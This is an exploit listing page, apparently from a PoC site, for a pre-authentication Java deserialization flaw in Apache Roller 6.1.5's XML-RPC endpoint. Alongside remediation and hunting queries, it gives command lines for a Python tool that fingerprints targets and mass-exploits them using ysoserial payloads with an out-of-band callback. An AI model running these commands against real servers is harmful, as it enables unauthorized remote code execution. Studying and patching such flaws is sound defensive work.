CVE-2026-82384 — Apache Roller 6.1.5 XML-RPC Pre-Auth Java Deserialization
September 28, 2026 · 108 views
Unauthenticated Java deserialization (CWE-502) on Apache Roller 6.1.5 legacy XML-RPC servlet: enabledForExtensions allows ex:serializable before Blogger/MetaWeblog auth; mapping stays active even when XML-RPC is disabled in UI. Pre-auth RCE via attacker-controlled serialized objects (ysoserial/classpath gadgets). Fixed in 6.1.6+. CVSS 9.8 Critical. Python PoC: check, probe-deser, exploit, mass -j.
Description
Overview
CVE-2026-82384 affects Apache Roller 6.1.5 only — deserialization of untrusted data (CWE-502) on the legacy XML-RPC endpoint.
Apache Roller is a Java multi-user blog server (Tomcat WAR, UI under /roller-ui/, APIs at /roller-services/xmlrpc).
| | |
|---|---|
| Affected | Apache Roller 6.1.5 |
| Fixed | 6.1.6+ (PR #171: enabledForExtensions=false, reject when XML-RPC disabled) |
| Endpoint | POST /roller-services/xmlrpc (also /roller/roller-services/xmlrpc) |
| Trigger | <ex:serializable> base64 Java object in XML-RPC before auth |
| Auth | None for the deserialization primitive |
| CVSS 3.1 | 9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| Credit | n0mi1k · Apache Software Foundation |
Why it matters: XmlRpcServlet runs with enabledForExtensions=true, so ws-xmlrpc accepts ex:serializable. Parsing happens during HTTP handling, before XML-RPC credentials are checked. The servlet mapping remains in web.xml even when admins set webservices.enableXmlRpc=false — disabling XML-RPC in the UI does not remove this pre-auth path on 6.1.5.
PoC page: https://pocbit.org/pocs/cve-2026-82384
Bundled tool (Python 3)
Members: download poc.py from this page (View exploit code).
pip install -r requirements.txt
python poc.py -u https://blog.example.com --mode check
python poc.py -u https://blog.example.com --mode check --probe-deser
python poc.py --list targets.example.txt --mode check -j 12
python poc.py -u https://blog.example.com --mode exploit \
--ysoserial-jar ysoserial.jar --ysoserial-gadget URLDNS \
--ysoserial-cmd pocbit.your-oast.domain
python poc.py -u https://blog.example.com --mode exploit --payload-file chain.b64
python poc.py --list targets.txt --mode exploit -j 10 --ysoserial-jar ysoserial.jar ...
| Mode | Behavior |
|------|----------|
| check | Roller fingerprints, XML-RPC URL, optional --probe-deser |
| exploit | Post serialized payload (file, base64, or ysoserial via --ysoserial-jar) |
| Mass | --list + -j → JSONL + exploited.txt |
This PoC does not ship live RCE gadget chains (classpath-dependent). Use ysoserial or your own verified payload in authorized labs.
Attack surface
- Content-Type:
text/xml - Impact: RCE as Tomcat/Roller OS user; blog data and host pivot
- Related (6.1.6): CVE-2026-82377 (XML-RPC authz), CVE-2026-82386 (XXE in bookmark import)
Remediation
- Upgrade to Roller 6.1.6+ immediately.
- Block
/roller-services/xmlrpcat reverse proxy / WAF until patched. - Inventory:
Apache Roller,/roller-ui/, XML-RPC paths.
Hunting (examples)
body="Apache Roller"
body="/roller-ui/"
body="/roller-services/xmlrpc"
Confirm 6.1.5 from footer, about page, or release notes before treating as exploitable.
Legal and ethical use
Authorized testing only. Deserialization exploits can destroy data and violate law if misused.
References
- NVD — CVE-2026-82384
- Apache Roller 6.1.6 release / PR #171
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- Web appCVE-2026-90817critical
CVE-2026-90817 — REDCap Unauthenticated RCE (Survey __passthru / Data Import)
Unauthenticated remote code execution in REDCap ≥ 13.3.0 via public survey __passthru routing and Data Import path handling. Patched in 16.0.49, 17.3.10, and 17.4.4+. Requires a valid public survey hash (s=) for the published check/exploit tooling.
- Web appCVE-2026-48842high
CVE-2026-48842 — Roundcube Webmail Pre-Auth SQLi (virtuser_query)
Pre-authentication SQL injection in Roundcube Webmail via the virtuser_query plugin and a preg_replace() backslash escape bypass. Affects 1.6.x before 1.6.16 and 1.7.x before 1.7.1 (CVSS 3.1 8.1 HIGH).
- JoomlaCVE-2026-97163critical
CVE-2026-97163 — Joomla UP Plugin Unauthenticated GitHub Action Install
Unauthenticated remote code installation in UP (Universal Plugin) for Joomla (lomart.fr) 5.0.0–5.2.0 and 6.0.0–6.0.29: mini package triggers on-demand GitHub action download into plugins/content/up/actions/ with TLS verify disabled (MITM risk). CVSS 4.0 10.0 Critical. Fixed in 5.2.1 and 6.1.0.
- Web appCVE-2026-100835critical
CVE-2026-100835 — Edgeless Contrast Remote Attestation Relay (aTLS)
Remote attestation relay (CWE-295) in Edgeless Systems Contrast before 1.16.0: cryptographically valid TEE reports matching ReferenceValues were accepted without binding to specific trusted hardware, allowing MITM relay to impersonate Coordinator or workloads in attested TLS. Fixed in 1.16.0 with AllowedChipIDs (SEV-SNP) and AllowedPIIDs (TDX). CVSS 4.0 9.1 Critical (VulnCheck). PoC audits manifests, detects versions, probes Coordinator — no MITM/TEE forgery.